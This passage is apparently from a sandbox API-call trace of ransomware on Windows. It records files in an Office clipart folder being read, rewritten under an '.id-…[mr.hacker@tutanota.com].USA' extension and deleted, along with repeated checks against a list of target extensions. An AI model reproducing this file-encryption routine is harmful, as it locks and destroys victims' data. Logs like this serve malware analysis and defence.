returned 1 [0273.220] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf")) returned 1 [0273.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.220] lstrlenW (lpString=".doc") returned 4 [0273.220] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.220] lstrlenW (lpString=".docx") returned 5 [0273.221] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.221] lstrlenW (lpString=".pdf") returned 4 [0273.221] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.221] lstrlenW (lpString=".xls") returned 4 [0273.221] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.221] lstrlenW (lpString=".xlsx") returned 5 [0273.221] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.221] lstrlenW (lpString=".ppt") returned 4 [0273.221] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.221] lstrlenW (lpString=".zip") returned 4 [0273.221] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.221] lstrlenW (lpString=".rar") returned 4 [0273.221] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.221] lstrlenW (lpString=".bz2") returned 4 [0273.221] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.221] lstrlenW (lpString=".7z") returned 3 [0273.221] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.221] lstrlenW (lpString=".dbf") returned 4 [0273.221] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.221] lstrlenW (lpString=".1cd") returned 4 [0273.221] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.221] lstrlenW (lpString=".jpg") returned 4 [0273.221] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.222] lstrlenW (lpString=".doc") returned 4 [0273.222] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.222] lstrlenW (lpString=".docx") returned 5 [0273.222] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.222] lstrlenW (lpString=".pdf") returned 4 [0273.222] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.222] lstrlenW (lpString=".xls") returned 4 [0273.222] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.222] lstrlenW (lpString=".xlsx") returned 5 [0273.222] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.222] lstrlenW (lpString=".ppt") returned 4 [0273.222] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.222] lstrlenW (lpString=".zip") returned 4 [0273.222] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.222] lstrlenW (lpString=".rar") returned 4 [0273.222] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.222] lstrlenW (lpString=".bz2") returned 4 [0273.222] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.222] lstrlenW (lpString=".7z") returned 3 [0273.222] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.222] lstrlenW (lpString=".dbf") returned 4 [0273.222] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.222] lstrlenW (lpString=".1cd") returned 4 [0273.222] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned 63 [0273.222] lstrlenW (lpString=".jpg") returned 4 [0273.223] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.223] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.223] lstrlenW (lpString="HM00426_.WMF") returned 12 [0273.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0273.223] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=68776) returned 1 [0273.223] CloseHandle (hObject=0x328) returned 1 [0273.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf")) returned 0x20 [0273.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0273.223] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.223] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0273.224] GetLastError () returned 0x0 [0273.224] ReadFile (in: hFile=0x328, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x10ca8, lpOverlapped=0x0) returned 1 [0273.241] WriteFile (in: hFile=0x2a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x10cb0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x10cb0, lpOverlapped=0x0) returned 1 [0273.242] ReadFile (in: hFile=0x328, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.242] WriteFile (in: hFile=0x2a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.243] SetEndOfFile (hFile=0x2a8) returned 1 [0273.243] CloseHandle (hObject=0x2a8) returned 1 [0273.243] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.243] SetEndOfFile (hFile=0x328) returned 1 [0273.246] CloseHandle (hObject=0x328) returned 1 [0273.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.354] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf")) returned 1 [0273.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.365] lstrlenW (lpString=".doc") returned 4 [0273.367] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.367] lstrlenW (lpString=".docx") returned 5 [0273.367] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.372] lstrlenW (lpString=".pdf") returned 4 [0273.372] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.372] lstrlenW (lpString=".xls") returned 4 [0273.372] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.372] lstrlenW (lpString=".xlsx") returned 5 [0273.372] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.372] lstrlenW (lpString=".ppt") returned 4 [0273.372] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.372] lstrlenW (lpString=".zip") returned 4 [0273.372] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.372] lstrlenW (lpString=".rar") returned 4 [0273.372] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.372] lstrlenW (lpString=".bz2") returned 4 [0273.372] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.372] lstrlenW (lpString=".7z") returned 3 [0273.372] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.373] lstrlenW (lpString=".dbf") returned 4 [0273.373] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.373] lstrlenW (lpString=".1cd") returned 4 [0273.373] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.373] lstrlenW (lpString=".jpg") returned 4 [0273.373] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.373] lstrlenW (lpString=".doc") returned 4 [0273.373] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.373] lstrlenW (lpString=".docx") returned 5 [0273.373] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.373] lstrlenW (lpString=".pdf") returned 4 [0273.373] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.373] lstrlenW (lpString=".xls") returned 4 [0273.373] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.373] lstrlenW (lpString=".xlsx") returned 5 [0273.373] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.373] lstrlenW (lpString=".ppt") returned 4 [0273.373] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.373] lstrlenW (lpString=".zip") returned 4 [0273.373] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.373] lstrlenW (lpString=".rar") returned 4 [0273.373] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.373] lstrlenW (lpString=".bz2") returned 4 [0273.373] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.373] lstrlenW (lpString=".7z") returned 3 [0273.374] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.374] lstrlenW (lpString=".dbf") returned 4 [0273.374] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.374] lstrlenW (lpString=".1cd") returned 4 [0273.374] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 63 [0273.374] lstrlenW (lpString=".jpg") returned 4 [0273.374] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.374] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.374] lstrlenW (lpString="IN00957_.WMF") returned 12 [0273.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.374] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2944) returned 1 [0273.374] CloseHandle (hObject=0x380) returned 1 [0273.374] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf")) returned 0x20 [0273.374] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.375] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.375] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0273.375] GetLastError () returned 0x0 [0273.375] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xb80, lpOverlapped=0x0) returned 1 [0273.379] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xb90, lpOverlapped=0x0) returned 1 [0273.380] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.380] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.380] SetEndOfFile (hFile=0x3b4) returned 1 [0273.380] CloseHandle (hObject=0x3b4) returned 1 [0273.380] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.380] SetEndOfFile (hFile=0x380) returned 1 [0273.382] CloseHandle (hObject=0x380) returned 1 [0273.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.382] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf")) returned 1 [0273.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.382] lstrlenW (lpString=".doc") returned 4 [0273.382] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.383] lstrlenW (lpString=".docx") returned 5 [0273.383] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.383] lstrlenW (lpString=".pdf") returned 4 [0273.383] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.383] lstrlenW (lpString=".xls") returned 4 [0273.383] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.383] lstrlenW (lpString=".xlsx") returned 5 [0273.383] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.383] lstrlenW (lpString=".ppt") returned 4 [0273.383] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.383] lstrlenW (lpString=".zip") returned 4 [0273.383] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.383] lstrlenW (lpString=".rar") returned 4 [0273.383] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.383] lstrlenW (lpString=".bz2") returned 4 [0273.383] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.383] lstrlenW (lpString=".7z") returned 3 [0273.383] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.383] lstrlenW (lpString=".dbf") returned 4 [0273.383] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.383] lstrlenW (lpString=".1cd") returned 4 [0273.383] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.383] lstrlenW (lpString=".jpg") returned 4 [0273.383] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.383] lstrlenW (lpString=".doc") returned 4 [0273.383] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.384] lstrlenW (lpString=".docx") returned 5 [0273.384] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.384] lstrlenW (lpString=".pdf") returned 4 [0273.384] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.384] lstrlenW (lpString=".xls") returned 4 [0273.384] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.384] lstrlenW (lpString=".xlsx") returned 5 [0273.384] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.384] lstrlenW (lpString=".ppt") returned 4 [0273.384] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.387] lstrlenW (lpString=".zip") returned 4 [0273.387] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.387] lstrlenW (lpString=".rar") returned 4 [0273.387] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.387] lstrlenW (lpString=".bz2") returned 4 [0273.387] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.387] lstrlenW (lpString=".7z") returned 3 [0273.387] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.387] lstrlenW (lpString=".dbf") returned 4 [0273.387] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.387] lstrlenW (lpString=".1cd") returned 4 [0273.387] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned 63 [0273.387] lstrlenW (lpString=".jpg") returned 4 [0273.388] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.388] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0273.388] lstrlenW (lpString="J0075478.GIF") returned 12 [0273.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.411] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=1220) returned 1 [0273.411] CloseHandle (hObject=0x380) returned 1 [0273.411] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif")) returned 0x20 [0273.411] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.412] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.412] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0273.412] GetLastError () returned 0x0 [0273.412] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x4c4, lpOverlapped=0x0) returned 1 [0273.428] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0273.429] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.429] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.429] SetEndOfFile (hFile=0x3b4) returned 1 [0273.429] CloseHandle (hObject=0x3b4) returned 1 [0273.429] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.429] SetEndOfFile (hFile=0x380) returned 1 [0273.431] CloseHandle (hObject=0x380) returned 1 [0273.431] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.431] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif")) returned 1 [0273.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned 63 [0273.432] lstrlenW (lpString=".doc") returned 4 [0273.432] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0273.432] lstrlenW (lpString=".docx") returned 5 [0273.432] lstrcmpiW (lpString1=".docx", 